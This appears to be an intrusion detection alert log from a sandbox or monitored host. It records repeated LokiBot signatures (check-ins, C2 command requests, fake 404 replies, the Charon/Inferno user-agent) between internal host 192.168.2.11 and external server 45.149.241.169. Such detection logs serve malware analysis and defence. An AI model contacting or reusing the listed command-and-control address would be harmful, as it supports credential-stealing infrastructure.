2024-10-03T09:20:52.895647+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 49714 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:52.900738+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 49714 | TCP |
2024-10-03T09:20:53.059614+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 49715 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:53.059614+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 49715 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:53.059614+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 49715 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:55.154508+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 49715 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:55.154508+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 49715 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:55.160370+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 49715 | TCP |
2024-10-03T09:20:55.313220+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 49717 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:55.313220+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 49717 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:55.313220+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 49717 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:56.378201+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 49717 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:56.378201+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 49717 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:56.544536+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 49718 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:56.544536+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 49718 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:56.544536+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 49718 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:57.546571+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 49718 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:57.546571+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 49718 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:58.316168+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 55843 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:58.316168+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 55843 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:58.316168+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 55843 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:59.117485+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 55843 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:59.117485+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 55843 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:59.122929+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 55843 | TCP |
2024-10-03T09:20:59.272737+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64348 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:59.272737+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64348 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:20:59.272737+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64348 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:00.355678+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64348 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:00.355678+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64348 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:00.670903+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64350 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:00.670903+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64350 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:00.670903+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64350 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:01.453898+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64350 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:01.453898+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64350 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:01.459279+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64350 | TCP |
2024-10-03T09:21:01.623467+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64352 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:01.623467+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64352 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:01.623467+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64352 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:02.292636+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64352 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:02.292636+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64352 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:02.297469+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64352 | TCP |
2024-10-03T09:21:02.448704+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64354 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:02.448704+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64354 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:02.448704+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64354 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:03.191952+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64354 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:03.191952+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64354 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:03.202516+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64354 | TCP |
2024-10-03T09:21:03.488048+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64355 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:03.488048+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64355 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:03.488048+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64355 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:04.262865+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64355 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:04.262865+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64355 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:04.268373+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64355 | TCP |
2024-10-03T09:21:04.428362+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64357 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:04.428362+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64357 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:04.428362+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64357 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:05.200763+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64357 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:05.200763+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64357 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:05.205632+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64357 | TCP |
2024-10-03T09:21:05.363793+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64358 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:05.363793+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64358 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:05.363793+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64358 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:06.209342+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64358 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:06.209342+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64358 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:06.216904+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64358 | TCP |
2024-10-03T09:21:06.386274+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64359 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:06.386274+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64359 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:06.386274+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64359 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:07.095755+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64359 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:07.095755+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64359 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:07.101687+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64359 | TCP |
2024-10-03T09:21:07.265208+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64360 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:07.265208+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64360 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:07.265208+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64360 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.058000+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64360 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.058000+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64360 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.062889+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64360 | TCP |
2024-10-03T09:21:08.224949+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64361 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.224949+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64361 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.224949+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64361 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.908970+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64361 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.908970+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64361 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:08.918941+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64361 | TCP |
2024-10-03T09:21:09.172629+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64362 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.172629+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64362 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.172629+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64362 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.839583+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64362 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.839583+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64362 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.844424+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64362 | TCP |
2024-10-03T09:21:09.997521+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64363 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.997521+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64363 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:09.997521+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64363 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:10.836642+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64363 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:10.836642+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64363 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:10.841978+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64363 | TCP |
2024-10-03T09:21:10.996788+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64364 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:10.996788+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64364 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:10.996788+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64364 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:11.918002+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64364 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:11.918002+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64364 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:11.926165+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64364 | TCP |
2024-10-03T09:21:12.112321+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64365 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:12.112321+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64365 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:12.112321+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64365 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:12.880481+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64365 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:12.880481+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64365 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:12.885827+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64365 | TCP |
2024-10-03T09:21:13.055508+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64366 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.055508+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64366 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.055508+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64366 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.766337+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64366 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.766337+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64366 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.771289+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64366 | TCP |
2024-10-03T09:21:13.916854+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64367 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.916854+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64367 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:13.916854+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64367 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:14.575323+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64367 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:14.575323+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64367 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:14.606299+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64367 | TCP |
2024-10-03T09:21:14.881238+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64368 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:14.881238+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64368 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:14.881238+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64368 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:15.899147+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64368 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:15.899147+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64368 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:16.059969+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64369 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:16.059969+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64369 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:16.059969+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64369 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:16.915649+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64369 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:16.915649+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64369 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:16.922230+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64369 | TCP |
2024-10-03T09:21:17.083633+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64370 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:17.083633+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64370 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:17.083633+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64370 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:17.866524+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64370 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:17.866524+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64370 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:17.872168+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64370 | TCP |
2024-10-03T09:21:18.023488+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64371 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:18.023488+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64371 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:18.023488+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64371 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:19.008215+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64371 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:19.008215+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64371 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:19.175709+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64372 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:19.175709+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64372 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:19.175709+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64372 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:21.428539+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64372 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:21.428539+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64372 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:21.433380+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64372 | TCP |
2024-10-03T09:21:21.592824+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64373 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:21.592824+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64373 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:21.592824+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64373 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:22.234810+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64373 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:22.234810+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64373 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:22.239708+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64373 | TCP |
2024-10-03T09:21:22.386915+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64374 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:22.386915+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64374 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:22.386915+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64374 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.090242+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64374 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.090242+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64374 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.095072+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64374 | TCP |
2024-10-03T09:21:23.246842+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64375 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.246842+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64375 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.246842+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64375 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.948484+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64375 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.948484+0200 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.11 | 64375 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:23.953248+0200 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 45.149.241.169 | 80 | 192.168.2.11 | 64375 | TCP |
2024-10-03T09:21:24.104473+0200 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.11 | 64376 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:24.104473+0200 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.11 | 64376 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:24.104473+0200 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.11 | 64376 | 45.149.241.169 | 80 | TCP |
2024-10-03T09:21:24.875611+0200 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.11 | 64376 | 45.149.241.169 | 80 | TCP |
